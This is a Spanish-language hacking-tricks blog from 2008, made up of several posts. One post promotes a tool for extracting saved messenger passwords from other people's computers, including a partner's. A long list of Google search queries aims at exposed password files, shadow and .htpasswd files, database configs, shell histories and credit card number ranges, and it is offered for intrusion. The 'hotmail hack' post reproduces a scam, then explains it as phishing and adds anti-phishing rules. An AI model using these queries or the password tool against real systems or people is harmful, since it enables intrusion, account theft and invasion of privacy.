Se humilde pero trata de no pasar por estúpido. Ser ignorante en algo no es pecado, ser ignorante, saber que se es y no hacer nada al respecto, eso es estúpido. Ser humilde pasa por saber lo que se quiere sin despreciar las opiniones ajenas aunque estén en contra de lo que tú opines. Nunca debes creer que tú y solo tú tienes la verdad absoluta.

Cuando debas preguntarle algo a alguien que tu crees que sabe la respuesta haz preguntas concretas, no generales. Un ejemplo “¿cómo jaqueo hotmail?” es una pregunta general y el que la escuche pensará que no solo eres ignorante sino estúpido, en cambio si formulas una pregunta tal como “¿cuál es el algoritmo de encriptación que usa hotmail para almacenar una cookie?” eso es concreto y el que la escucha piensa al menos que tú sabes qué es una cookie, cómo funcionan y qué es un algoritmo de encriptación, esto habla mucho mejor de tí mismo y hasta le puedes caer simpatico, tanto que le invite a responderte claramente. Recuerda esto: “es mejor quedarse callado y pasar por estúpido y no abrir la boca y demostrarlo”.

Contesta más y pregunta menos. Obviamente al principio te asaltarán muchas preguntas pero antes de formularlas busca tu mismo las respuestas. Dicen que un alumno aprendió la lección cuando es capaz de enseñar a otros, entonces verás que tus dudas se resuelven más rápido contestando las preguntas de los demás, eso, sinceramente me consta (pon en duda esto que digo!, regla 2).

PD: deja el correo de tu novia o novio en paz, que si eres celoso/a entonces no mereces estar con ella/él.

_______________________________________________________________
De: Diego Romero
Para: www.trucoshacker.nireblog.com

Publicado en Hotmail | Etiquetado: | Deja un Comentario »

Nueva versión del AIMPR [v2.80] para sacar Passwords del MSN Messenger – hack Passwords del MSN Messenger

Publicado por jd33 en Marzo 30, 2008

 Msn Messenger

 messenger

Ya está disponible una nueva versión (v2.80) de este magnífico software, que permite sacar passwords del MSN Messenger en ordenadores cuyos usuarios marquen la casilla de guardar password al conectarse al Messenger. Viene actualizado para los últimos clientes de MSN Messenger, Yahoo Messenger, ICQ, AOL, etc. (saca los passwords de todos, no solo del MSN Messenger). Muy útil para cybers, el ordenador de la novia/novio, institutos, etc. Para descargar entra:

Publicado en Mesengger | Etiquetado: | 1 comentario

Como ser un Hacker

Publicado por jd33 en Marzo 30, 2008

Como ser un hacker?
Seguramente usted habrá visto ese capítulo de la serie CSI donde un juvenil y arrogante “hacker” coloca su laptop sobre el escritorio para mostrar sus habilidades con… ¡Windows XP! Pero más allá de los productores televisivos mal informados, el hecho es que mucha gente sueña con ser un hacker. Es común recibir correos pidiendo ayuda para “tirar” un sitio o robar una contraseña de hotmail.

Publicado en hack | Etiquetado: | Deja un Comentario »

Google hacking – www.boocle.wordpress.com

Publicado por jd33 en Marzo 30, 2008

Usando Gooogle podremos encontrar cosas muy interesantes q nos divertiran o
someteran una pagina a permitir una intrusion. Gracias a http://villamella.do.nu/
este tipo si que es una bd.

Podemos encontrar

Numeros de tarjetas de credito:
Contraseñas
Programas / MP3’s
ETC…Luego de ver estos ejemplos intenten crear sus propias busquedas para
obtener especificamente lo que buscan.

Pruben estas busquedas:

intitle:”Index of” passwords modified
allinurl:auth_user_file.txt
“access denied for user” “using password”
“A syntax error has occurred” filetype:ihtml
allinurl: admin mdb
“ORA-00921: unexpected end of SQL command”
inurl:passlist.txt
“Index of /backup”
“Chatologica MetaSearch” “stack tracking:”

Se imaginaran q son estos Grin:

Amex Numbers: 300000000000000..399999999999999
MC Numbers: 5178000000000000..5178999999999999
visa 4356000000000000..4356999999999999

Directorios y contraseñas al descubierto:

“parent directory “
/appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

“parent directory “
DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

“parent directory “Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

“parent directory “
Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

“parent directory ” MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

“parent directory ” Name of Singer or
album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

En estas busquedas solo estoy cambiando el nombre luego de “parent directory
” ,cambienlo por lo que quieran y obtendran distintos resultados.

Intenten con estas busquedas:

?intitle:index.of? mp3

Solo hay q poner le nombre del cantante o cancion

Ejemplo: ?intitle:index.of? mp3 Metallica

inurl:microsoft filetype:iso

Pueden cambiar la busqueda a lo que quieran, ejemplo: Microsoft a Linux ,
iso a rar ….

“# -FrontPage-” inurl:service.pwd
Contraseñas de Frontpage Cheesy

“AutoCreate=TRUE password=*”
Contraseñas de “Website Access Analyzer”, un programa japones q crea
stadisticas web.

“http://*:*@www” dominio

Contraseñas, solo substituye “dominio” por el dominio q busques sin el .com
.net o lo q sea.

Ejemplo:
“http://*:*@www” micronosoft or “http://*:*@www”micronosoft

Otro modo es escribiendo:
“http://bob:bob@www/”;

“sets mode: +k”
Esta busqueda muestra contraseñas de los canales de IRC en los logs.

allinurl: admin mdb
Bases de datos Grin

allinurl:auth_user_file.txt
Archivo de contraseñas de DCForum’s y DCShop(carrito de compras). Este
archivo contiene muchas contraseñas crackeables, nombres de usuarios y
emails.

intitle:”Index of” config.php
Estos archivos nomarlmente contienen el usuarios,dir y contraseña de las
bases de datos.Tendras administracion total de la DB.

eggdrop filetype:user user
Nombres de usuario y contraseñas en canales de IRC.

intitle:index.of.etc
Esta busqueda te mostrara la pagina principal de la carpeta etc/ donde se
pueden encontrar muchos archivos importantes y contraseñas, no siempre se
encontraran contraseñas pero puedes encontrar muchas cosas interesantes aca.

filetype:bak inurl:”htaccess|passwd|shadow|htusers”
Esto mostrara muchos archivos de backups(respaldos) creados por programas o
por el administrador.

Si necesitas buscar algun numero serial para algun programa,digamos windows
XP profesional.

“Windows XP Professional” 94FBR

El 94FBR es devido a q este pedaso de codigo se encuentra en muchos de los
CD-keys de windows, asi q esto disminuira la cantidad de paginas pornos q
intentan engañarte.

¿Para qué tomarse la molestia de arremeter contra un sitio web en busca de
vulnerabilidades que hayan pasado inadvertidas cuando se puede entrar con
toda comodidad por la puerta delantera?

Estas intrusiones se pueden realizar gracias a que existen bases de datos
con conexión a Internet. Como las herramientas de gestión de bases de datos
utilizan plantillas (templates) estandarizadas para presentar los datos en
la Red, al ingresar ciertas frases específicas el usuario muchas veces puede
acceder directamente a las páginas que utilizan esas plantillas. Por
ejemplo, al ingresar la frase “Select a database to view” (seleccionar una
base de datos para ver) -una fase habitual en la interfaz de base de datos
FileMaker Pro- en el Google, se obtuvieron alrededor de 200 links, de los
cuales casi todos conducían a bases de datos creadas con FileMaker a las que
se puede acceder online.

Por ejemplo si usas lo siguiente:
1 – http://www.google.com/
2 – Buscar
“Index of /admin” + passwd
o
“Index of /wwwboard” + passwd
o
“Index of /backup” + mdb
Veras grandes resultados.!

Si escribes lo que aparece abajo en el buscador de google podras acceder a
base de datos, contraseñas, webs con bugs, hasta a numeros de tarjeta de
credito. Practica un poco y prueba los distintos comandos, luego crea tus
propias lineas para buscar. Un buen sitio de información de como hackear con
google es http://johnny.ihackstuff.com/ está en inglés, pero no llegarás a
nada si no visitas páginas como esta

filetype:htpasswd htpasswd
intitle:”Index of” “.htpasswd” -intitle:”dist” -apache -htpasswd.c
index.of.private (algo privado)
intitle:index.of master.passwd
inurl:passlist.txt (para encontrar listas de passwords)
intitle:”Index of..etc” passwd
intitle:admin intitle:login
“Incorrect syntax near” (SQL script error)
intitle:”the page cannot be found” inetmgr (debilidad en IIS4)
intitle:index.of ws_ftp.ini
“Supplied arguments is not a valid PostgreSQL result” (possible debilidad
SQL)
_vti_pvt password intitle:index.of (Frontpage)
inurl:backup intitle:index.of inurl:admin
“Index of /backup”
index.of.password
index.of.winnt

inurl:”auth_user_file.txt”
“Index of /admin”
“Index of /password”
“Index of /mail”
“Index of /” +passwd
Index of /” +.htaccess
Index of ftp +.mdb allinurl:/cgi-bin/ +mailto
allintitle: “index of/admin”
allintitle: “index of/root”
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
administrator.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index
inurl:passwd filetype:txt
inurl:admin filetype:db
inurl:iisadmin
inurl:”auth_user_file.txt”
inurl:”wwwroot/*.”
allinurl: winnt/system32/ (get cmd.exe)
allinurl:/bash_history
intitle:”Index of” .sh_history
intitle:”Index of” .bash_history
intitle:”Index of” passwd
intitle:”Index of” people.1st
intitle:”Index of” pwd.db
intitle:”Index of” etc/shadow
intitle:”Index of” spwd
intitle:”Index of” master.passwd
intitle:”Index of” htpasswd
intitle:”Index of” members OR accounts
intitle:”Index of” user_carts OR user _cart

_vti_inf.html
service.pwd
users.pwd
authors.pwd
administrators.pwd
test-cgi
wwwboard.pl
www-sql
pwd.dat
ws_ftp.log
http://usuarios.lycos.es/unsafebytes/hackingfreestyle/hackearcongoogle.htm

Revelar datos con Google no parece nada complicado, especialmente para todos
los sistemas mal configurados… una búsqueda específica permite mostrar
directorios poniendo en un índice y accediendo, la contraseña, los archivos,
los caminos, etc, etc…

Las Puntas de la búsqueda

las entradas de la búsqueda comúnes debajo de le dará una idea… por
ejemplo si usted quiere buscar el un índice de “root”

En la caja de la búsqueda puesta exactamente en como usted véalo debajo
source jhonyyhackstuff.com
Ejemplo 1:

allintitle: “index of/root”

Resultad:

http://www.google.com/search?hl=en&ie=ISO-8859-1&q=allintitle%3A+%22index+of
%2Froot%22&btnG=Google+Search

lo que revela es 2,510 páginas que usted puede ver y posiblemente se
encuentre su testamento…

Ejemplo 2:

inurl:”auth_user_file.txt”

http://www.google.com/search?num=100&hl=en&lr=&ie=ISO-8859-1&q=inurl%3A%22au
th_user_file.txt%22&btnG=Google+Search

Este da un resultado de 414 posibles archivos para acceder

INVESTIGUE LOS CAMINOS…….

*************************************

“Index of /admin”
“Index of /password”
“Index of /mail”
“Index of /” +passwd
“Index of /” +password.txt
“Index of /” +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto

administrators.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index

allintitle: “index of/admin”
allintitle: “index of/root”
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov

inurl:passwd filetype:txt
inurl:admin filetype:db
inurl:iisadmin
inurl:”auth_user_file.txt”
inurl:”wwwroot/*.”

top secret site:mil
confidential site:mil

allinurl: winnt/system32/ (get cmd.exe)
allinurl:/bash_history

intitle:”Index of” .sh_history
intitle:”Index of” .bash_history
intitle:”index of” passwd
intitle:”index of” people.lst
intitle:”index of” pwd.db
intitle:”index of” etc/shadow
intitle:”index of” spwd
intitle:”index of” master.passwd
intitle:”index of” htpasswd
intitle:”index of” members OR accounts
intitle:”index of” user_carts OR user_cart

ALTERNATIVE INPUTS====================

_vti_inf.html
service.pwd
users.pwd
authors.pwd
administrators.pwd
shtml.dll
shtml.exe
fpcount.exe
default.asp
showcode.asp
sendmail.cfm
getFile.cfm
imagemap.exe

Para buscar en idioma hacker:
http://www.google.com/intl/xx-hacker/

Para buscar en modo linuxero:
http://www.google.com/linux

Para buscar páginas por la cercanía a un punto geográfico:
http://labs.google.com/location

Para buscar en modo yanquee (Ugh!):
http://www.google.com/unclesam

Para buscar páginas viendo los resultados en una secuencia animada (probar
para entender):
http://labs.google.com/gviewer.html

Para buscar en modo MAC:
http://www.google.com/mac

Para buscar con la voz llamando a Google por teléfono (no es joda):
http://labs1.google.com/gvs.html

Para buscar en modo Micro$oft:
http://www.google.com/microsoft.html

Para buscar la definición de una palabra o frase:
http://labs.google.com/glossary

Para que google responda CUALQUIER pregunta mediante investigadores humanos:
http://answers.google.com/answers/

Para que google te avise por mail la aparición de noticias en algun lugar
del mundo sobre un tema que te interese:
http://www.google.com/newsalerts

Para buscar en modo BSD:
http://www.google.com/bsd

Para buscar en universidades (sólo de EEUU):
http://www.google.com/options/universities.html

Para buscar la opinión que tiene la gente acerca de algo:
http://labs.google.com/cgi-bin/webquotes

Para buscar sin usar el mouse (todo por teclado, se maneja ¡como el vi!)
http://labs.google.com/keys/index.html

Para buscar productos comerciales, segun su precio, calidad, y otros atributos:
http://froogle.google.com/

Para buscar desde una Palm, un celular u otro dispositivo inalámbrico:
http://www.google.com/options/wireless.html

Para buscar en catálogos de venta por correo:
http://catalogs.google.com/

Y bue con esto se aprende mucho gracias a johnny.

Tambien pueden hacer sus busquedas con esta pagina http://www.seguridad0.com/ejemplos/googlescan/

Admin:

www.trucoshacker.do.nu

Publicado en General | Deja un Comentario »

Preguntas sobre Hackers?

Publicado por jd33 en Marzo 30, 2008

Que es un hacker?

Da la impresión de que todos los males de Internet (virus, ataques a ordenadores, robos de tarjetas de crédito, etc.) son obra de los ‘hackers’. A pesar de la creencia extendida, la mayoría de los auténticos ‘hackers’ ayudan a mejorar la seguridad en Internet.
Hacker, Phreacker, Cracker
Un hacker no es un cracker, ni tampoco un phreaker.

¿Cuál es la diferencia?

Habría muchas formas de clasificar a los habitantes del Ciberespacio, pero la más corriente es aprovechando los conocimientos de que disponen del medio en el que circulan. Así, hay usuarios de “andar por casa”, hay gente más o menos informada sobre el funcionamiento de las cosas, usuarios medios, usuarios avanzados, técnicos, programadores de todos los niveles… y hackers.

HAckers Heroes o villasnos ?
Los ataques a los servidores se realizan con otros servidores que trabajan como zombies. Para conseguir enviar el número suficiente de peticiones y así saturar una máquina en un corto espacio de tiempo es necesario que el ataque sea lanzado por un número considerable de computadoras conectadas a la red y sincronizadas entre ..
Como convertirme en HAcker
De manera similar a muchas otras culturas sin economía monetaria, el hackerismo se basa en la reputación. Estás intentando resolver problemas interesantes, pero cuan interesantes y buenas son las soluciones que encuentres es algo que sólo tus iguales o superiores técnicamente hablando serán capaces de juzgar.
De acuerdo a esto, cuando juegas el juego del hacker, aprendes a puntuarte principalmente en función de lo que los otros hackers piensan acerca de tus habilidades..

Publicado en General | Etiquetado: | Deja un Comentario »

Como robar una pagina web?

Publicado por jd33 en Marzo 30, 2008

‘Phishing’: páginas web falsas para robar datos
La suplantación de sitios web para capturar datos personales es un delito en auge que hay que vigilar
Mensajes de correo electrónico que se hacen pasar por comunicados de bancos o tiendas de Internet reclaman la atención de los clientes para actualizar sus claves de acceso o confirmar su número de tarjeta de crédito a través de un enlace que les conduce a páginas web falsas. Sus datos son capturados y los delincuentes pueden suplantar la identidad de la víctima para realizar todo tipo de¿Qué es el ‘phishing’?
Se conoce como ‘phishing’ ( del inglés fishing – pescar) a la suplantación de identidad (en Internet, pero también por teléfono) que poperaciones en la Red. Es el fraude conocido como ‘phishing’, un delito en aumento que en EEUU ya ha alcanzado proporciones alarmantes y que amenaza con mermar la confianza en el correo electrónico e Internet.

Autor: Jose para Google.com | Fecha de publicación: 22 de septiembre de 2004

ersigue apropiarse de datos confidenciales de los usuarios. En la Red se utiliza el envío masivo de correos electrónicos que simulan proceder de entidades de prestigio y apremian al internauta a actualizar datos personales (nombres de usuario y contraseña de cuentas bancarias, números de tarjeta de crédito, etc.) a través de una página que imita a la original. Al introducir los datos en la página falsa, éstos son ‘pescados’ por los ciberdelicuentes para utilizarlos de forma fraudulenta.

Se trata de una forma de spam (correos electrónicos no deseados) especialmente perniciosa, pues no sólo satura los buzones de basura , sino que pone en peligro la integridad de la información sensible del usuario con graves consecuencias. La proliferación de estos mensajes fraudulentos obliga a estar alerta y, de entrada, a tener presente que no se deben ofrecer datos personales que sean solicitados mediante el correo electrónico sin, al menos, realizar una comprobación telefónica. El mecanismo de este timo online en auge es el siguiente:

El usuario recibe un email de un banco, entidad financiera o tienda de Internet en el que se le explica que por motivos de seguridad, mantenimiento, mejora en el servicio, confirmación de identidad o cualquier otro, debe actualizar los datos de su cuenta. El mensaje imita exactamente el diseño (logotipo, firma, etc.) utilizado por la entidad para comunicarse con sus clientes.
El mensaje puede integrar un formulario para enviar los datos requeridos, aunque lo más habitual es que incluya un enlace a una página donde actualizar la información personal.
Esta página es exactamente igual que la legítima de la entidad -algo sencillo copiando el código fuente (HTML)- y su dirección (URL) es parecida e incluso puede ser idéntica gracias a un fallo de algunos navegadores.
Si se rellenan y se envían los datos de la página caerán directamente en manos del estafador, quien puede utilizar la identidad de la víctima para operar en Internet.
El Anti-Phishing Working Group, organización creada en EEUU para combatir este fraude, asegura que el número y sofisticación del ‘phishing’ enviado a los consumidores se está incrementando de forma dramática y que “aunque la banca online y el comercio electrónico son muy seguros, como norma general hay que ser muy cuidadoso a la hora de facilitar información personal a través de Internet”.

Publicado en General | Etiquetado: , , , , , | Deja un Comentario »

Pequeño truco de hackear una cuenta de hotmail

Publicado por jd33 en Marzo 30, 2008

“Quieres kackear un correo de hotmail de alguien que odies aqui esta la oportunidad”

1- el primer paso para hackear la cuenta de hotmail es sencillo, 2- no decimos hackear por que es totalmente legal.. 3-una ves que entraste en tu cuenta de hotmail,debes componer un mensaje con las siguientes caracteristicas: Debes escribir la direccion del sistema, que contiene la base de datos sobre la cual hotmail realiza la verificacion de passwords, esa cuenta es la siguiente ejemplo no pongan esa Inventen algo asi… ,,,  (msn_login_passw@hotmail.com) para hacerle creer a tu vitima.. En el campo asunto debes escribir….> retrieve password Y copiar este Codigo que esta abajo, para despues pegarlo en el campo de mensaje Recuerda de escribir tu correo electronico correctamente y tu password, para que te llegue el pass de tu victima a tu correo… ————————————————————————————————— :form_pwd;login=(escribe aqui el login de tu victima) form.login.focus();form.passwd.gets=”;form_pwd;val ue=”yes”; sendto=(escribe tu correo electronico); form.passwd (escribe tu password) form_pwd;value=”admin”; nota importante: no tienes que escribir la direccion completa de tu victima,solo escribe el login(lo que esta antes del @)hotmail solo puede verificar las cuentas hotmail.por eso hace falta solo el login,si fuese de otro servidor no encontraria la cuenta… ahora solo envia el email, el mensaje sera recibido por una computadora que pensara que ha sido enviado por un miembro del staff de hotmail y en el termino de 5 a 10 minutos recibira el password de la victima…” Este tipo de trucos para hacerse con datos se llama ingeniería social. Se trata de una técnica de hacking sin ordenador. No sabéis la cantidad de cuentas, passwords y datos a los que se puede acceder sin utilizar un ordenador. Simplemente en papeleras, teléfonos o mirando por encima de un hombro. En particular cuando se utiliza el correo en el argot informático se llama phising. Se usa no solo para robar cuentas de hotmail, sino lo que es más grave para hacerse con datos importantes, sobre todo bancarios y asaltar cuentas. Para que no os pille desprevenido os pongo 5 normas básicas para evitar el phising bancario. El phishing no es un virus, sino una maniobra de ingeniería social por la que un usuario de correo electrónico es invitado a revelar sus claves bancarias a través de su introducción en una página Web que simula la de una entidad bancaria. Los mensajes enviados utilizan todo tipo de ingeniosos argumento: * Problemas de carácter técnico. * Recientes detecciones de fraude. * Nuevas recomendaciones de seguridad. * Cambios en la política de seguridad de la entidad. Ante esta campaña, se recomiendan 5 normas de fácil aplicación para evitar caer en estos señuelos: 1. No atienda a correos electrónico escritos en idiomas que no hable: su entidad financiera no se dirigirá a Ud en ese idioma si antes no lo han pactado previamente. 2. No atienda a correos enviados por entidades de las que no es cliente en los que le pidan datos íntimos o que afecten a su seguridad. 3. No atienda a sorteos u ofertas económicas de forma inmediata e impulsiva. 4. No atienda a correos que le avisen del cese de actividades financieras recibidos por primera vez y de forma sorpresiva. 5. No atienda a correos de los que sospeche sin confirmarlos telefónica o personalmente con la entidad firmante. En fin. La norma que siempre debes recordar se resume en una sola: Ningún proveedor te solicita que reveles tu cuenta y password por ningún medio (correo, teléfono, Web)

Publicado en General | Etiquetado: , , , , | Deja un Comentario »

¡Hola, mundo!

Publicado por jd33 en Marzo 29, 2008

Welcome to WordPress.com. This is your first post. Edit or delete it and start blogging!

Publicado en General | 2 Comentarios »